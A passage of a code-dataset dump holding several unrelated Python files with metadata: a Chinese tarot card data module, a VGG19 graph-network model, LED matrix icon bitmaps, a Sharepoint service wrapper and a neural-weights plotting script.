Manifestation', reversed='Lost opportunity, Missed chance, Bad investment, Missed chances, Scarcity, Deficiency, Instability, Stinginess, Bad investments' ), init=False) two_of_pentacles: TarotCard = field(default=TarotCard( id=65, index='two_of_pentacles', type='minor_arcana', orig_name='Two of Pentacles', name='星币二', intro='一个红衣装扮,头戴高帽,类似街头艺人的男子,正在耍弄两个星币,星币外围的带子形成8自形无限符号,魔术师和力量牌中也有这个符号。他背后的海面起伏剧烈,两艘船正在其上行驶。', words='两难', desc='星币二暗示与金钱有关的决定。\n\n星币二显示一个专注于钱财的人。此时他并没有重大的财务压力,只是要决定那张账单要先付而已。保持弹性,是星币二带给我们的另一个课题。除了随机应变的弹性,星币二也求取平衡。\n\n星币二描述着权衡各种机会的轻重,而这次它们是属于身体或物质的层面上。这象征着介于两个选择之间的决定。你有没有办法现在就抉择,或是再等一会儿会不会比较好呢?', upright='Balancing decisions, Priorities, Adapting to change, Balancing resources, Adaptation, Resourcefulness, Flexibility, Stretching resources', reversed='Loss of balance, Disorganized, Overwhelmed, Imbalance, Unorganized, Messiness, Chaos, Overextending' ), init=False) three_of_pentacles: TarotCard = field(default=TarotCard( id=66, index='three_of_pentacles', type='minor_arcana', orig_name='Three of Pentacles', name='星币三', intro='在一座修道院里头,有位雕刻师正在工作,旁边两位修道人拿着草图,似乎正在和雕刻师讨论工作的进度。', words='学习', desc='星币三暗示透过研究、学习,或者将构想付诸实现,而改善自身的境遇。\n\n这张牌代表扎根于稳固的基础上,建立某些具有持久价值的东西。也许你是在建造一栋房子,开始学习一个对你有助益的课程,或为稳固的两性关系或生意打基础。星币三对自我发展而言是张正面的牌。星币三表示去作某些将可以改善你环境事情的一段时间。它可能是开始一个课程、阅读书籍,或如果它是出现在事业的分析中,那就是你在工作当中学习拥有一个机会去建立某种具有永久价值的东西。\n\n星币三是一个鼓励,鼓励当事人不管在进行什么样的工作,都可以仔细计划,然后放手去做,因为他具备完成工作所需要的专业能力,他有充足的才干来达成手边任何任务。星币三的成功不是偶然,他不仅有专业能力,还实实在在的工作。', upright='Teamwork, Collaboration, Building, Shared goals, Apprenticeship, Effort, Pooling energy', reversed='Lack of teamwork, Disorganized, Group conflict, Lack of cohesion, Apathy, Poor motivation, Conflict, Ego, Competition' ), init=False) four_of_pentacles: TarotCard = field(default=TarotCard( id=67, index='four_of_pentacles', type='minor_arcana', orig_name='Four of Pentacles', name='星币四', intro='图中的男人戴着皇冠,身穿象征统治威权的红色袍子,下摆饰以蓝边,显示出崇高的领主身分。他坐在一个箱子上,头顶一枚星币,双手紧抓着另一枚,双脚又各踩着两枚,紧张的神情似乎深怕他失去任何一丁点财产。这个人虽有钱,却孤绝于城市人群之外。', words='节约', 
desc='星币四意味厚积薄发,节省你的金钱或体能以迎接更大的挑战。\n\n星币四正位置常代表物质上的获利与稳定,获利的来源可能是工作,也可能是接受赠与或遗产。然而,星币四代表物质上的稳定,却不保证心灵上的成长。星币四意味你正在节约金钱、节省精力,或是节制。它也可能意味经由节约金钱、偿还债务及量入为出,而是你的财务状况日趋稳定。或许你在设计增加收入或减少指出,以确保自己进来的钱比出去的多。', upright='Conservation, Frugality, Security, Possessiveness, Insecurity, Hoarding, Stinginess, Stability, Savings, Materialism, Wealth, Boundaries, Guardedness', reversed='Greediness, Stinginess, Possessiveness, Generosity, Giving, Spending, Openness, Financial insecurity, Reckless spending' ), init=False) five_of_pentacles: TarotCard = field(default=TarotCard( id=68, index='five_of_pentacles', type='minor_arcana', orig_name='Five of Pentacles', name='星币五', intro='冰天雪地中,两个乞丐蹒跚前行,又瘸又驼背,身上的衣服破烂不堪。他们经过一间象征物质与精神庇护的教堂,却视而不见,挺着饥饿且疲惫的身躯,径自赶路。', words='困难', desc='星币五意味对那些充实你的事物的疏离感。\n\n卡面上的两个人本可以选择如何去发现、跟随及落实精神之路。教堂其实只是他们的一种选择。它代表把精神价值介绍给那些无意去追求的人。在五这张牌中,这些人没有看见它,因此丧失了一个改变的机会。外在悲惨是内在悲惨的一种反映,所以当星币五出现时,你需要接受生命提供给你的改变机会。“如果你想改变这个世界,请先改变你自己”是这张牌的答案。\n\n就整体观点来看,星币五说的是财务上的困难、贫穷、疾病和内在的寂寞。在不断的挣扎当中,你很容易窄化你对问题的焦点,而忽略了你的机会。当这张五出现时,深度的心灵改变是有其需要的,否则虽然有外在的助力,可能还是解决不了你的问题。你目前的人生观并非你的支柱,而现在你必须问自己,是否仍愿意保有这些信念。', upright='Need, Poverty, Insecurity, Hardship, Loss, Isolation, Feeling abandoned, Adversity, Struggle, Unemployment, Alienation, Disgrace', reversed='Recovery, Charity, Improvement, Positive changes, Recovery from loss, Overcoming adversity, Forgiveness, Feeling welcomed' ), init=False) six_of_pentacles: TarotCard = field(default=TarotCard( id=69, index='six_of_pentacles', type='minor_arcana', orig_name='Six of Pentacles', name='星币六', intro='一个商人装扮的男子,脚边跪着两个乞丐。商人右手施舍其中一名乞丐,左手拿着象征平衡的天秤。', words='施舍', desc='星币六暗示没有绝对的公平,其中一人比另一人更有控制力。\n\n星币六是在形容一种结构性的关系,其中一人比另一人更有控制力。是一张有很多层面的牌,而它的意义又会随着问题或周遭的牌而改变,在这张牌中,看似公平和正当,不过,请注意,两个乞丐是跪在富翁的面前。在这个关系里,他是处于有权力的地位。星币六是在形容一种关系:一个人支配另外一个人。\n\n跪在地上的人事实上是受制于他的,暗示着局面是由他所控制,而他是透过他的财富来掌控这一切。这个站着的人深谙拥有金钱就是拥有权力。他就越能选择自己的人生。施与受中间不只是金钱,知识、经验、技术的传授也算。所以星币六也代表知识、经验、技术的传授或是学习。', upright='Charity, Generosity, Sharing, Community, Material help, Support, Giving and 
receiving, Gratitude', reversed='Strings attached, Stinginess, Power and domination, Power dynamics, Abuse of generosity, Strings attached gifts, Inequality, Extortion' ), init=False) seven_of_pentacles: TarotCard = field(default=TarotCard( id=70, index='seven_of_pentacles', type='minor_arcana', orig_name='Seven of Pentacles', name='星币七', intro='一位农夫把下巴架在杖上,低头看着他长久辛勤得来的收成。这丛农作物在他的耕耘下,已经可以自己成长茁壮了。农夫的表情似乎很满足,又彷佛在思考下一步该怎么做。', words='规划', desc='星币七意味着思考未来的财务或物质状况。\n\n星币七暗示目前工作即将完结,只剩下一点尾巴要收而已。经历过去长时间段孜孜不倦的努力,现在可以暂停一下,看看自己目前的成就,想想下一步的行止。星币七是一种实际面上的投资与等待,并且具有时间性,能解释出过去和未来的现象。代表过去曾经付出努力,投注了资源和精神,如今正在等待成果,未来也将有机运得到这些回收。处于一种回顾和期待的状态。\n\n星币七代表思考和计划未来的一段时间。你的生活或目前的状况尚称平稳,所以你有时间可以安静的计划未来的步骤。这可能包括进一步的学习、强调休闲、谨慎地经营现有财物,甚至再创另一种事业,以补充现有的事业。花些时间多做思考吧,因为你的决定有可能对将来产生很大的影响。', upright='Hard work, Perseverance, Diligence, Harvest, Rewards, Results, Growth, Progress, Patience, Planning', reversed='Work without results, Distractions, Lack of rewards, Unfinished work, Procrastination, Low effort, Waste, Lack of growth, Setbacks, Impatience, Lack of reward' ), init=False) eight_of_pentacles: TarotCard = field(default=TarotCard( id=71, index='eight_of_pentacles', type='minor_arcana', orig_name='Eight of Pentacles', name='星币八', intro='一位雕刻匠坐在长板凳上,专注而勤劳地刻着星币星币,他前面已经完成六个了,脚边还有一个未完成。有一条黄色的道路连接远方的市镇与雕刻匠,连接工作与社会,无论什么工作,目的都是服务人群,雕刻匠并未忘记这一点。', words='上进', desc='星币八暗示对某人或某种状况的承诺。\n\n星币八是代表工作赚钱的一张牌,也表示能够累积财富,集中心力在赚取金钱上。这是一张代表承诺并专注于眼前工作的牌,而意念当中这乃是为了较长的目标而努力。\n\n星币八暗示对一个人或一种状况的深度承诺。现在你则着重于你的技巧以及如何变得更精炼。可以透过不懈的努力,或进一步的学习让技艺更上层楼。这张牌时说你已经在群体当中找到了自己的位置,并且在做适合你做的事情。你明白工作不应该是沉闷无味的,而是一种自我完成的机会。工作不仅只是为了填满你时间、胃或口袋,更重要的是让你的人生完整。', upright='Apprenticeship, Passion, High standards, Skill, Talent, Craftsmanship, Quality, Expertise, Mastery, Commitment, Dedication, Accomplishment', reversed='Lack of passion, Uninspired, No motivation, Lack of quality, Rushed job, Bad reputation, Lack of motivation, Mediocrity, Laziness, Low skill, Dead-end job' ), init=False) nine_of_pentacles: TarotCard = field(default=TarotCard( 
id=72, index='nine_of_pentacles', type='minor_arcana', orig_name='Nine of Pentacles', name='星币九', intro='一位衣着华丽的女子站在她的庄园中,四周葡萄茂盛,正是收成时节。她右手扶在星币上,大拇指还扣着一根葡萄藤,左手则戴着白手套,让她的小鸟站在上面,小鸟的头部却被红布遮住了。', words='自律', desc='星币九代表收获与安逸,丰富的物质生活与相对应的束缚。\n\n星币九是一张代表自信或自我依赖的牌,那可说是要达到超凡成就的必要条件。你的自信如果在搭配上自律的话,那将使你在许多层面上获益。\n\n大体上来说,星币九形容由于过去的努力而带来的一种舒适的生活。星币九代表财富的成功与富足,显示对于生活实际投入的层面,并表达了物质与精神层面的相互关系。', upright='Fruits of labor, Rewards, Luxury, Rewarded efforts, Success, Achievement, Independence, Leisure, Material security, Self-sufficiency', reversed='Reckless spending, Living beyond means, False success, Being guarded, Material instability, Superficiality' ), init=False) ten_of_pentacles: TarotCard = field(default=TarotCard( id=73, index='ten_of_pentacles', type='minor_arcana', orig_name='Ten of Pentacles', name='星币十', intro='星币十的近景是一位老年人,他舒服的坐着,身旁围绕着两只狗。拱门外的市镇中有一对青年男女,似乎在讨论什么,还有一个小孩子。十个星币排列成生命之树的符号。', words='富裕', desc='星币十意味归于平静的物质上的成功。\n\n星币十意味物质上的成功,星币十画的是一个安稳而舒适的居家环境。从墙上盾形家徽看得出这是一个富裕而巩固的环境,这个家庭拥有能提供舒适物质环境的一切条件。那么,为什么每个人都没有面对着别人呢?这老人是坐着的,他的注意力放在动物们的身上,年轻人背对我们,而女人也没有面对他,却稍稍侧着脸继续和他谈话。小孩子被忽略了,这些人彼此之间也没有真正的关联。它们得到别人所渴望的物质世界,不过很显然这也使他们感到沉闷,并陷入公式化的生活中,一旦这种公式消失,将无所适从。\n\n星币十是整组牌可能性的充分显示。他缺乏权杖的热情、宝剑的理想以及圣杯牌的情感。在这里可以找到物质上的安全感和稳定,但也付出了代价。', upright='Legacy, Culmination, Inheritance, Roots, Family, Ancestry, Windfall, Foundations, Privilege, Affluence, Stability, Tradition', reversed='Fleeting success, Lack of stability, Lack of resources, Family disputes, Bankruptcy, Debt, Conflict over money, Instability, Breaking traditions' ), init=False) page_of_pentacles: TarotCard = field(default=TarotCard( id=74, index='page_of_pentacles', type='minor_arcana', orig_name='Page of Pentacles', name='星币侍从', intro='星币待从双脚坚稳的站立在地面上,高高捧着星币,他所着迷的东西,在眼前仔细地观察着。他头戴红色软帽头饰,带子围着肩颈。身上的穿着是以棕色为底,套着绿色的外衣,鞋子和腰带也是棕色的。他站在青葱且长满花朵的草地上,远方有茂密的树丛,画面的右下还有一座山。', words='勤奋', 
desc='星币侍从意味着为理想而努力学习。\n\n星币侍从象征有关金钱、新工作或学习一门课程的消息。它可以表示去学习某些将会产生实质效益的事物。这个侍从通常代表学生的勤奋向学。透过学习一门课程,或于工作中学习,发挥了自己的能力。有时候这个侍从可能暗示你对于正在学习的科目,变得更专注,甚至更重视学习的成果。', upright='Ambition, Desire, Diligence, Ambitious, Diligent, Goal oriented, Planner, Consistent, Star student, Studious, Grounded, Loyal, Faithful, Dependable', reversed='Lack of commitment, Greediness, Laziness, Foolish, Immature, Irresponsible, Lazy, Underachiever, Procrastinator, Missed chances, Poor prospects' ), init=False) knight_of_pentacles: TarotCard = field(default=TarotCard( id=75, index='knight_of_pentacles', type='minor_arcana', orig_name='Knight of Pentacles', name='星币骑士', intro='星币骑士笔直地坐在黑马背上,仔细打量手上的星币。黑色的强壮马匹配着厚实的红色马鞍和缰绳,侧面垂着红色的软坐垫,牢牢地站在地面,是四张骑士牌中唯一不动的座骑。骑士戴着头盔,头盔顶端饰有穗状的绿叶,黑马的头顶也有相同的叶穗。他身着厚重盔甲,外披一件暗红色战袍,也戴着红色的手套。星币骑士处于空旷的大地上,眼前应是一望无际。远方的地面是一片经过细心耕耘的田地,背景是一片鲜黄色。', words='稳健', desc='星币骑士代表稳健而认真的计划。\n\n星币骑士通常指的是强化你的计划,并朝确定的目标迈进。它意味着为了实现一个目标而努力工作。就一个人而言,这个人对于承诺非常的认真,不论是对事业、个人雄心或两性关系。通常,他相信这个格言:“如果你想做好一件事,那就自己动手吧。”', upright='Efficiency, Hard work, Responsibility, Practical, Reliable, Efficient, Stoic, Slow and steady, Hard-working, Committed, Patient, Conservative', reversed='Laziness, Obsessiveness, Work without reward, Workaholic, Dull, Boring, No initiative, Cheap, Irresponsible, Gambler, Risky investments' ), init=False) queen_of_pentacles: TarotCard = field(default=TarotCard( id=76, index='queen_of_pentacles', type='minor_arcana', orig_name='Queen of Pentacles', name='星币皇后', intro='星币皇后的面貌端庄而正直,双手捧着星币,并低头凝望着星币,神情若有所思。她的后冠是圆顶的,中间有插着两根红色羽毛,星币皇后的后袍是红色的,内衫露出的袖子是白色的,是红白对立的组合,绿色的披风由头上往下延伸到椅上。皇后的宝座处在长满丰盛植物的平原上,在茂密的林荫中,玫瑰花围绕成的拱门之下,所在的草地之上盛开着多株玫瑰花,。座椅是精工雕琢的,刻满了纹饰。有许多植物和天使的图案,很像圣杯皇后的座椅,扶前端有羊头的浮雕,椅侧有小孩的浮雕,椅背刻满了藤蔓瓜叶。宝座旁的近景是一片肥沃的土地,满是绿草和花朵。', words='安定', desc='星币皇后意味着喜爱大自然,又有良好的商业眼光。\n\n从一般观点来看,星币皇后是一张代表信任自己能力的牌。她意味经由深思熟虑而带来成功。作为一个人,星币皇后通常有着敏锐的生意眼光,而且总是喜欢存点钱在身边,好让自己有安全感。在有需要的时候她会很节俭,而且不会任意炫耀财富。她是一个可靠、实际的人,知道应该在那里下功夫可以得到最大的成功。\n\n这张皇后牌是指务实、可靠,并擅长喂养植物和动物。她也喜欢经常到乡间旅行,或漫步于大自然中,因为她需要和自然保持接触,让生命有完整而踏实的感觉。', 
upright='Practicality, Creature comforts, Financial security, Generous, Caring, Nurturing, Homebody, Good business sense, Practical, Comforting, Welcoming, Sensible, Luxurious', reversed='Self-centeredness, Jealousy, Smothering, Selfish, Unkempt, Jealous, Insecure, Greedy, Materialistic, Gold digger, Intolerant, Self-absorbed, Envious' ), init=False) king_of_pentacles: TarotCard = field(default=TarotCard( id=77, index='king_of_pentacles', type='minor_arcana', orig_name='King of Pentacles', name='星币国王', intro='星币国王悠然自得的坐在他的花园里。他的左手拿着星币,右手拿着权杖,姿态轻松。花围中长满象征丰收成果的葡萄和各种植物,他的服装也满是葡萄图案,整个人似乎与大自然融成一体。宝座上有牛头图案,是星币的家族图腾。国王的右手靠在座椅的扶手上,掌中握着宝球权柄。左手持拥五芒星金币,并垫起左脚让这枚大金币更稳定确实地置于膝上。国王慵懒地靠在椅背上,低眼安然地端详着他的金币。', words='坚定', desc='星币国王表示务实而坚定的态度可以带来成功。\n\n星币国王暗示透过身体力行而达到成功。它也可以说是务实的努力带来物质上的成功。星币国王代表的是一个脚踏实地而又成熟的人。他的个性稳健、可靠且保守,并能努力履行其承诺,谨慎的负起他应负的责任。他不像权杖国王般富冒险精神,或像圣杯国王那么有创意,但他可凭藉着慢慢而稳定的步伐,以及认真的实践来达到成功。', upright='Abundance, Prosperity, Security, Ambitious, Safe, Kind, Patriarchal, Protective, Businessman, Provider, Sensual, Reliable', reversed='Greed, Indulgence, Sensuality, Materialistic, Wasteful, Chauvanist, Poor financial decisions, Gambler, Exploitative, Possessive' ), init=False) class TarotPacks(object): """ 定义套牌 """ SpecialCard: TarotPack = TarotPack( name='special', cards=[card for card in TarotCards.get_all_cards() if card.type == 'special']) MajorArcana: TarotPack = TarotPack( name='major_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'major_arcana']) MinorArcana: TarotPack = TarotPack( name='minor_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'minor_arcana']) RiderWaite: TarotPack = TarotPack( name='rider_waite', cards=[card for card in TarotCards.get_all_cards() if ( card.type == 'major_arcana' or card.type == 'minor_arcana')]) __all__ = [ 'TarotCards', 'TarotPacks' ]
zh
0.782484
@Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm 所有卡牌 每个属性都是一张牌 获取所有塔罗牌的列表 :return: List[TarotCard] 定义套牌
2.582664
3
models/cifar/vgg19.py
Shimaa1/group_activity_gcn
1
6618643
<reponame>Shimaa1/group_activity_gcn<filename>models/cifar/vgg19.py '''VGG for CIFAR10. FC layers are removed. (c) <NAME> ''' import torch import torch.nn as nn import torch.nn.functional as F import torch.utils.model_zoo as model_zoo import math import numpy as np import torchvision.models as models #from mypath import Path from torch.autograd import Variable from models.cifar.gcn import _gcn class vgg(_gcn): def __init__(self, num_classes=1000, net='vgg19', model_dir=''): _gcn.__init__(self, num_classes) self.net = net self.group_cls = num_classes self.model_dir = model_dir def _init_modules(self): if self.net == 'vgg19': model = models.vgg19() model.classifier = nn.Sequential( nn.Linear(3072, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 9), ) state_dict = torch.load(self.model_dir) model.load_state_dict({k:v for k,v in state_dict['state_dict'].items() if k in model.state_dict()}) elif self.net == 'vgg19_bn': model = models.vgg19_bn() print("Loading pretrained weights from %s" % Path.model_dir(self.net)) self._load_pretrained_weights(self.net) #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:]) model.classifier = nn.Sequential(*list(model.classifier._modules.values())[:-1]) self.base_model = model
'''VGG for CIFAR10. FC layers are removed. (c) <NAME> ''' import torch import torch.nn as nn import torch.nn.functional as F import torch.utils.model_zoo as model_zoo import math import numpy as np import torchvision.models as models #from mypath import Path from torch.autograd import Variable from models.cifar.gcn import _gcn class vgg(_gcn): def __init__(self, num_classes=1000, net='vgg19', model_dir=''): _gcn.__init__(self, num_classes) self.net = net self.group_cls = num_classes self.model_dir = model_dir def _init_modules(self): if self.net == 'vgg19': model = models.vgg19() model.classifier = nn.Sequential( nn.Linear(3072, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 9), ) state_dict = torch.load(self.model_dir) model.load_state_dict({k:v for k,v in state_dict['state_dict'].items() if k in model.state_dict()}) elif self.net == 'vgg19_bn': model = models.vgg19_bn() print("Loading pretrained weights from %s" % Path.model_dir(self.net)) self._load_pretrained_weights(self.net) #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:]) model.classifier = nn.Sequential(*list(model.classifier._modules.values())[:-1]) self.base_model = model
en
0.414746
VGG for CIFAR10. FC layers are removed. (c) <NAME> #from mypath import Path #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:])
2.445785
2
ledmatrix/components/icon.py
mattgrogan/ledmatrix
1
6618644
<reponame>mattgrogan/ledmatrix from PIL import Image, ImageColor from components import Viewport_NoScroll_Mixin # TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) class Icon(Viewport_NoScroll_Mixin): """ Create an icon image """ @staticmethod # def Icon(icon_name, color="#FFFFFF"): def Icon(data): icon_name = data["icon_name"] color = data["icon_color"] return Icon.Build(BMP[icon_name], color) @staticmethod def Build(bitmap, color="#FFFFFF"): im = Image.new("RGB", (12, 12)) pix = im.load() for x in range(12): for y in range(12): row = bitmap[y] cell = row & (1 << (12 - x - 1)) pix[x, y] = ImageColor.getrgb(color) if cell else (0, 0, 0) return Icon(im) def __init__(self, icon): self.image = icon self.reset() @property def size(self): return self.image.size BMP = {} BMP["sunny"] = [0x020, 0x422, 0x204, 0x0F0, 0x1F8, 0xDF8, 0x1FB, 0x1F8, 0x0F0, 0x204, 0x442, 0x040] BMP["cloud"] = [0x000, 0x000, 0x000, 0x018, 0x1A4, 0x242, 0x402, 0x402, 0x244, 0x1B8, 0x000, 0x000] BMP["lightning"] = [0x008, 0x018, 0x030, 0x070, 0x0E0, 0x1FC, 0x3F8, 0x070, 0x0E0, 0x0C0, 0x180, 0x100] BMP["house"] = [0x060, 0x0F0, 0x1F8, 0x3FC, 0x7FE, 0xFFF, 0xFFF, 0x264, 0x264, 0x3FC, 0x3FC, 0x3FC] BMP["clock"] = [0x0F0, 0x30C, 0x402, 0x406, 0x909, 0x891, 0x861, 0x801, 0x402, 0x402, 0x30C, 0x0F0] BMP["end"] = [0x180, 0x3FC, 0x7FC, 0x7FC, 0x3FC, 0x180, 0x000, 0xEE2, 0xAA2, 0xEAE, 0x8AA, 0xEAE] BMP["bulb"] = [0x040, 0x444, 0x208, 0x0E0, 0x110, 0xD16, 0x110, 0x0E0, 0x000, 0x0E0, 0x0E0, 0x0E0] BMP["train"] = [0x1F8, 0x30C, 0x3FC, 0x204, 0x204, 0x3FC, 0x3FC, 0x36C, 0x3FC, 0x090, 0x108, 0x204] BMP["exclamation"] = [0x070, 0x070, 0x070, 0x060, 0x060, 0x060, 0x040, 0x040, 0x040, 0x000, 0x0C0, 0x0C0]
from PIL import Image, ImageColor from components import Viewport_NoScroll_Mixin # TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) class Icon(Viewport_NoScroll_Mixin): """ Create an icon image """ @staticmethod # def Icon(icon_name, color="#FFFFFF"): def Icon(data): icon_name = data["icon_name"] color = data["icon_color"] return Icon.Build(BMP[icon_name], color) @staticmethod def Build(bitmap, color="#FFFFFF"): im = Image.new("RGB", (12, 12)) pix = im.load() for x in range(12): for y in range(12): row = bitmap[y] cell = row & (1 << (12 - x - 1)) pix[x, y] = ImageColor.getrgb(color) if cell else (0, 0, 0) return Icon(im) def __init__(self, icon): self.image = icon self.reset() @property def size(self): return self.image.size BMP = {} BMP["sunny"] = [0x020, 0x422, 0x204, 0x0F0, 0x1F8, 0xDF8, 0x1FB, 0x1F8, 0x0F0, 0x204, 0x442, 0x040] BMP["cloud"] = [0x000, 0x000, 0x000, 0x018, 0x1A4, 0x242, 0x402, 0x402, 0x244, 0x1B8, 0x000, 0x000] BMP["lightning"] = [0x008, 0x018, 0x030, 0x070, 0x0E0, 0x1FC, 0x3F8, 0x070, 0x0E0, 0x0C0, 0x180, 0x100] BMP["house"] = [0x060, 0x0F0, 0x1F8, 0x3FC, 0x7FE, 0xFFF, 0xFFF, 0x264, 0x264, 0x3FC, 0x3FC, 0x3FC] BMP["clock"] = [0x0F0, 0x30C, 0x402, 0x406, 0x909, 0x891, 0x861, 0x801, 0x402, 0x402, 0x30C, 0x0F0] BMP["end"] = [0x180, 0x3FC, 0x7FC, 0x7FC, 0x3FC, 0x180, 0x000, 0xEE2, 0xAA2, 0xEAE, 0x8AA, 0xEAE] BMP["bulb"] = [0x040, 0x444, 0x208, 0x0E0, 0x110, 0xD16, 0x110, 0x0E0, 0x000, 0x0E0, 0x0E0, 0x0E0] BMP["train"] = [0x1F8, 0x30C, 0x3FC, 0x204, 0x204, 0x3FC, 0x3FC, 0x36C, 0x3FC, 0x090, 0x108, 0x204] BMP["exclamation"] = [0x070, 0x070, 0x070, 0x060, 0x060, 0x060, 0x040, 0x040, 0x040, 0x000, 0x0C0, 0x0C0]
en
0.646117
# TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) Create an icon image # def Icon(icon_name, color="#FFFFFF"):
3.033034
3
src/netcompany_toolkit/service/SharepointService.py
WypeBoard/incident_numbers
0
6618645
from src.netcompany_toolkit.Settings import Settings from src.netcompany_toolkit.model.Sharepoint import Sharepoint from src.netcompany_toolkit.model.enum.SharepointStatus import SharepointStatus def _get_sharepoint() -> Sharepoint: _config = Settings() return Sharepoint(_config) def fetch_case_with_id(case_id: str) -> dict: sharepoint = _get_sharepoint() return sharepoint.get_specific_case(case_id) def update_status(case_id: int, status: SharepointStatus): pass def fetch_case_view() -> list: sharepoint = _get_sharepoint() return sharepoint.get_personal_case_view()
from src.netcompany_toolkit.Settings import Settings from src.netcompany_toolkit.model.Sharepoint import Sharepoint from src.netcompany_toolkit.model.enum.SharepointStatus import SharepointStatus def _get_sharepoint() -> Sharepoint: _config = Settings() return Sharepoint(_config) def fetch_case_with_id(case_id: str) -> dict: sharepoint = _get_sharepoint() return sharepoint.get_specific_case(case_id) def update_status(case_id: int, status: SharepointStatus): pass def fetch_case_view() -> list: sharepoint = _get_sharepoint() return sharepoint.get_personal_case_view()
none
1
1.952308
2
plotting/old/plot_new.py
knc-neural-calculus/HH-neurons-learning
0
6618646
import os import sys import numpy as np import matplotlib.pyplot as plt def plot_weights_dist(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() hist, _ = np.histogram(all_weights,bins) plt.plot(bins[:-1], hist, label=('e=%d' % n), c=[(n/100) / 120, 0.2, 0.2]) plt.show() def plot_weights_neg_percent(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) x = range(0,12000,100) y = [] print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() n_neg = 0 for w in all_weights: if w < 0: n_neg += 1 y.append(100 * n_neg / len(all_weights)) plt.plot(x, y) plt.show() def heatmap_alt(dirname, idx_str, fig, ax, epoch): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') ax.set_title("epoch = %d, idx_str = %s" % (epoch, idx_str)) cbar = ax.figure.colorbar(im, ax=ax) def heatmap(dirname, idx_str, fig, ax, epoch, row_idx): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') W = W[row_idx][:-1] W = W.reshape((28, 28)) X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') # ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) if __name__ == "__main__": epochs = [0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 11900 ] rows = [80 + i for i 
in range(10)] fig, axs = plt.subplots(len(rows), len(epochs)) for i, r in enumerate(rows): for j, e in enumerate(epochs): print(i, j) heatmap(sys.argv[1], 'W1', fig, axs[i][j], e, r) # fig.tight_layout() plt.show()
import os import sys import numpy as np import matplotlib.pyplot as plt def plot_weights_dist(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() hist, _ = np.histogram(all_weights,bins) plt.plot(bins[:-1], hist, label=('e=%d' % n), c=[(n/100) / 120, 0.2, 0.2]) plt.show() def plot_weights_neg_percent(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) x = range(0,12000,100) y = [] print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() n_neg = 0 for w in all_weights: if w < 0: n_neg += 1 y.append(100 * n_neg / len(all_weights)) plt.plot(x, y) plt.show() def heatmap_alt(dirname, idx_str, fig, ax, epoch): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') ax.set_title("epoch = %d, idx_str = %s" % (epoch, idx_str)) cbar = ax.figure.colorbar(im, ax=ax) def heatmap(dirname, idx_str, fig, ax, epoch, row_idx): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') W = W[row_idx][:-1] W = W.reshape((28, 28)) X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') # ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) if __name__ == "__main__": epochs = [0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 11900 ] rows = [80 + i for i 
in range(10)] fig, axs = plt.subplots(len(rows), len(epochs)) for i, r in enumerate(rows): for j, e in enumerate(epochs): print(i, j) heatmap(sys.argv[1], 'W1', fig, axs[i][j], e, r) # fig.tight_layout() plt.show()
en
0.105239
# ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) # fig.tight_layout()
2.501467
3
course_mgr/info_handler.py
TutorSim/tutorsim
0
6618647
